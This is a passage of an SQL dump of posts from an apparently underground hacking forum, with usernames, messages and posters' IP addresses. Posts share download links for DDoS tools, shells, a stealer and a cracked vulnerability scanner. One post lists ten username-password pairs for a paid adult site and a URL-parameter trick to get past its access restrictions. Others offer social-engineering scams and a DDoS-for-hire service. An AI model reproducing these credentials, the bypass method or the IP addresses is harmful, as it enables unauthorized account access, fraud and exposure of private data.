'1', '0', '0', '0', '1', 'd51145a4f4a7209f985004d41ac22c4d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3200', '651', '0', '61', '[Free] Thread Design', '0', '82', 'iTzIpod', '1349205877', '[align=center][b]Since this is a PSD, you can edit it to look good for LH. Enjoy![/b][/align] [spoiler] [align=center][img]http://i.minus.com/iXOVnsT3iXz5g.png[/img][/align] [/spoiler] [b]Download[/b] http://www.mediafire.com/?6xr4zha21my3agy', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3685355ec1107d477c627ea00e125e5b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3114', '190', '665', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1349106126', 'I follow this thread everyday waiting until someone posts a pornhub link :/', '31.22.163.234', '521577450', '1', '0', '0', '0', '1', 'ea38377a58951d0a29e672a91b3af030', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3115', '642', '0', '61', '[FREE] DDOS, Cracking, Shells, Tools, phpfirewall and more!', '0', '62', 'R?????zo?', '1349107590', '[align=center]I found this recently, it has abit of everything. [size=medium][b][color=#1E90FF]What are you getting:[/color][/b][/size] [img]http://i.imgur.com/m0CFX.png[/img] Download: http://109.163.225.194/download/files/ [/align]', '31.22.163.234', '521577450', '1', '0', '0', '0', '1', 'cf5834f4b40c915ca0a3205727d8de4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3116', '643', '0', '7', 'L33thakcers.com members here?', '0', '213', 'BitMonst3r', '1349107675', 'Hi guys, any l33thackers.com members are here? :D I know its not the same forum, just interested.', '188.69.227.48', '-1136270544', '0', '0', '0', '0', '1', '888726af6d90f16b427c0f2b277b58d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3117', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '82', 'iTzIpod', '1349119074', 'My friend can SE anything from Logitech. I can SE anything from Logitech also. But it would take a while? If you\'re interested, add me on Skype. Skype: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7a9510289de1cf0e1261d3fe81abd914', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3118', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '82', 'iTzIpod', '1349119181', 'Nope. Heard of it though. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bcf0a6d7437198353670f4f0462bddb8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3119', '608', '2943', '66', 'RE: Welcome To Gamers!', '0', '82', 'iTzIpod', '1349119219', 'Reloadzor! You should add me on Skype :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f8ca77ec10cd2cd05632dee113af2feb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3120', '642', '3115', '61', 'RE: [FREE] DDOS, Cracking, Shells, Tools, phpfirewall and more!', '0', '82', 'iTzIpod', '1349119270', 'Thanks for the contribution dude. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '743a39abcc7f49bfa132630f24fb41d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3121', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349119303', 'http://www.youtube.com/ :[ LOL @Reloadzor.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '579e7948e369f603385839a8a065af83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3123', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1349119700', 'DAMM ur all welcome :) and i will be posting more soon...', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'a47b8ce0f9a6f19afc386ffd653306bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3124', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '82', 'iTzIpod', '1349120194', 'Feel free to post some stuff in Unique. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5499a1a59383a771bbbd91ed1360893f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3125', '608', '3119', '66', 'RE: Welcome To Gamers!', '0', '62', 'R?????zo?', '1349120677', '[quote=\'iTzIpod\' pid=\'3119\' dateline=\'1349119219\'] Reloadzor! You should add me on Skype :3 [/quote] added you <3', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '143348ceb5b106c48ca27923f0130ee0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3126', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1349120732', 'alrighty :P but i dont raelly have anything to post about yet so...', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'e9ffea03bd5a20e061f3937c67339f24', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3127', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '203', 'NeonLights', '1349122231', 'hmm i would love to have a new sig :3 with my name, green,red,yellow, and a rasta hat on the N of my name and a weed leaf in the background! :D if u could make me this i would shit my pants :D', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '16f9e06f0f579700d7a53f9bacdb0f69', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3128', '190', '3114', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1349122995', '[quote=\'R?????zo?\' pid=\'3114\' dateline=\'1349106126\'] I follow this thread everyday waiting until someone posts a pornhub link :/ [/quote] Oh my god LOL Made me burst out laughing.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '2ebda1960b588831051b55542baaf403', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3129', '626', '3020', '19', 'RE: ?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '203', 'NeonLights', '1349123752', 'AWSomme could i get these plz? :3', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'de9dcd73c8d369894a159a79f0994d7c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3130', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '203', 'NeonLights', '1349123943', 'Username: NeonLights Name: Nick Age: 15 Profile: http://l33thacking.net/user-203.html little extra: im very HQ and have a positive rep why is hould join: well, IM SEXY, and i love to play games like mw3 and battlefield on my xbox 360 :D and i love to play on my computer... and im a hardcore gamer i almost play 24/7 and yea thats that :D', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'e1cebf18b176364b638a258c19f6aa9b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3131', '626', '3020', '19', '[Junk]?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '82', 'iTzIpod', '1349124385', 'This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3132', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349124504', 'Exactly :p I know NXK would post one soon :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '171fffd349798cac951f5d9f15e1322d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3133', '613', '3111', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1349124785', '[quote=\'R?????zo?\' pid=\'3111\' dateline=\'1349105223\'] I mean I can try again for you if you are more specific, for free.. I will animate it. [/quote] If you\'d like to go for it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'be0907b74ea096c06d34b5485ac731cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3134', '190', '665', '56', 'RE: Copy and paste game', '0', '100', '??zg???g????61', '1349124870', 'WTF witchcraft?!!?!? LOL I think I was spamming my friend that. XD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'c4017aab18e71d767482e93f1dc6b542', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3135', '431', '3104', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '100', '??zg???g????61', '1349124982', '[quote=\'R?????zo?\' pid=\'3104\' dateline=\'1349098046\'] [quote=\'iTzGRONgamer61\' pid=\'3000\' dateline=\'1349029835\'] Heyo, could I have a sig made for myself? Could i have \"GRONgamer61\'s DDoS\'ing Service $4/Hour\", in black and red letters. I\'d like the font to look retro and shiny ;D [/quote] not sure if you wanted something like this [img]http://i.imgur.com/b6ooB.gif[/img] I know you wanted red but it didn\'t look too good. [/quote] Holy crap. Thats an AWESOME signature, thanks a TON!!! +Rep\'d ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '349cc749f872598111517e590c38d79f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3136', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1349126666', 'Dang it.. Me and Reloadzor have the same rep now :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '29e476cb943bd00daeb090de98034452', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3137', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349126710', 'http://www.lfpress.com/2012/10/01/shooting-victim-terrell-johnson-remembered-for-big-smile Was doing it for one of my school assignments. Current events. Had to list the links I used.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '116ca14e317549b99ea02b7b780ea65d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3138', '453', '2129', '19', '[Junk]Instagram Bot 3.2', '0', '82', 'iTzIpod', '1349127640', 'This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3139', '346', '1642', '19', '[Junk]Heads Up', '0', '82', 'iTzIpod', '1349127769', 'This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3140', '422', '1936', '19', '[Junk][Read] Announcement', '0', '82', 'iTzIpod', '1349127796', 'This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3141', '385', '1768', '19', '[Junk][Important] Discussion', '0', '82', 'iTzIpod', '1349127861', 'This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3142', '485', '2352', '19', '[Junk][?] Switching Userbars?', '0', '82', 'iTzIpod', '1349127861', 'This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3143', '644', '0', '19', '[Junk]Testing', '0', '82', 'iTzIpod', '1349127944', '[mod]Testing - iTzIpod[/mod] Yeahh I\'m awesome. [hr] This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '82', '1349127960', '1', '9522f3daca3be95c370b94ea99b1292b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3144', '431', '3127', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1349129242', '[quote=\'NeonLights\' pid=\'3127\' dateline=\'1349122231\'] hmm i would love to have a new sig :3 with my name, green,red,yellow, and a rasta hat on the N of my name and a weed leaf in the background! :D if u could make me this i would shit my pants :D [/quote] [img]http://i.imgur.com/2Ytdn.gif[/img] something like that bro?', '94.132.244.168', '1585771688', '1', '0', '62', '1349129260', '1', '26990360b30acedd5fe9c1e51ba7aaee', '0', '1349129260'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3145', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '203', 'NeonLights', '1349132315', 'HOLY FUCK YES :D but the rasta hat looks pretty shitty :P but thx :D', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '72894f3515392bf42784722092ee61d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3146', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1349132652', 'if you get me a good rasta hat that you like .png i will fix it :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '46fa9190b3bd805d95f0913d6bdee857', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3147', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '203', 'NeonLights', '1349134523', 'ok cool :D il do that later im kinda busy now gotta wright a 600 word s.a -.- for school', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'ffc4e33d25bb5623aeb0097307857c01', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3148', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '100', '??zg???g????61', '1349138174', 'Love this thing, thanks for the share ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '3a7870d99f12a5e709cdc296f9198e25', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3149', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '1', 't3h jok3r', '1349138405', 'I don\'t think there are any l33thackers members here.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5499dd6ec7cd6e9a3a0768c75d54f9d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3150', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '1', 't3h jok3r', '1349138540', 'Honestly I never SE\'d Logitech. I know someone who can SE a gaming keyboard for you, I will ask them and let you know.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bbb71a2e22ac97a177d2fdc07772040e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3151', '635', '3093', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '1', 't3h jok3r', '1349138628', '[quote=\'Anonymous™\' pid=\'3093\' dateline=\'1349085229\'] It really shows that the community is growing. [/quote] True and thanks to everyone who has been part of this community and helped L33THacking grow. Every post counts.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6e436ab0fa67489c4485cd8ac6122c71', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3152', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1349140624', ':D glad u like it... if u have any requests just tell me il try to get it for you :)', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '5c35c2e931e75aa9c3f69b373dc4ada4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3153', '507', '2527', '13', 'RE: New dork on vulnerabilities and view files', '0', '1', 't3h jok3r', '1349141630', 'Thanks I checked out the dork and got my hands on some very useful information.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '39db1d743af31ce45daa2eddcd5bc332', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3154', '645', '0', '30', '[GET] Acunetix Web Vulnerability Scanner CE v8.0.20120305 Cracked !', '0', '1', 't3h jok3r', '1349141839', '[size=medium][color=#FF0000][b]Acunetix Web Vulnerability Scanner CE v8.0.20120305 Cracked ![/b][/color][/size] Release: Acunetix.Web.Vulnerability.Scanner.CE.v8.0.20120305.Retail.Cracked-BRD Version : v8.0.20120305 OS: WinAll Size: 19.3 MB [img]http://i42.tinypic.com/s3qddl.png[/img] Working and tested by ME! [u]DISCONNECT YOUR INTERNET BEFORE ACTIVATION![/u] Download: [code]http://www.mirrorcreator.com/files/AAT59JB9/CHF_AWVS_8.rar_links[/code] [size=large][u][align=center][color=#FF0000][b]A SIMPLE THANKS WILL BE APPRECIATED[/b][/color][/align][/u][/size]', '72.231.24.165', '1223104677', '1', '0', '1', '1349141904', '1', 'a9abc235e96f08814c9c3e170ef9f422', '0', '1349141904'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3155', '616', '3005', '67', 'RE: [PHP] IP Grabbing Script', '0', '1', 't3h jok3r', '1349142397', 'Nice script. It\'s a old and known trick but not many newbies and school students are aware of this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '59b9f9963bac7323f315d8e32203f351', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3156', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '1', 't3h jok3r', '1349142517', 'Closed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bf78a7ad11fd888c469a166cc728fe8a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3157', '646', '0', '29', '[Tutorial] Hack RealityKing The biggest Hack!! WATCH FULL MOVIES *HOT*', '0', '5', 'Timmy', '1349142670', '[code] fsunoles-noless dfger12-empire ykinaba-yk1783 aspeace-qwertyu8 poter96-37469311 waynewrw-wayne523 29hotterbc-tailgegg12 mihaiiliescu-alex1511 daveCH83-1qay2wsx bclinton042-budman01 [/code] http://members.realitykings.com/ What those user/password? These are passwords for RealityKings which are dead. You cannot watch or download from this account. *BUT* Here is what u can do with them: 1)Enter one of the accounts I gave you up. 2)Choose what sites u want to show/what video 3)After u choose site enter to video u want to show 4)click on WATCH FULL MOVIE ok now its goes like this u have the link above up click it and copy it It needs to look like this for example: [code] members.realitykings.com/?a=update.movie&site=streetblowjobs&id=8290 [/code] after u copy u write after movie_hd Example: [quote] members.realitykings.com/?a=update.movie_[color=#1E90FF]hd[/color]&site=streetblowjobs&id=8290 [/quote] u see what i did? /?a=update.movie_hd Picture: http://imageshack.us/photo/my-images/17/10492096.png/ Good luck!! :-) Credits: Kamito', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5350d7a4ceca7fbe7c76b83f005476ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3158', '635', '3085', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '5', 'Timmy', '1349142786', 'Congratz LH on 3K posts. Our next milestone should be 1K threads.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f6edbb484781141c5c551d0183ad97d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3159', '589', '3124', '15', 'RE: Crime24 Stealer', '0', '5', 'Timmy', '1349142899', '[quote=\'iTzIpod\' pid=\'3124\' dateline=\'1349120194\'] Feel free to post some stuff in Unique. :D [/quote] I disagree because if all the good content is in the Unique forum then they won\'t be activity in the main public forums which will drop L33Thackings activity and members.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0028b17637011ad1e01da4c7e45e2dc9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3160', '190', '665', '56', 'RE: Copy and paste game', '0', '5', 'Timmy', '1349143129', 'kamito I was giving someone credits so I copied the username.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5495896ac0651d586bb541695e235d42', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3161', '539', '2736', '4', 'RE: YO WHAT UP!', '0', '203', 'NeonLights', '1349143147', 'testing to see if my sig works having problems', '67.68.75.193', '1128549313', '1', 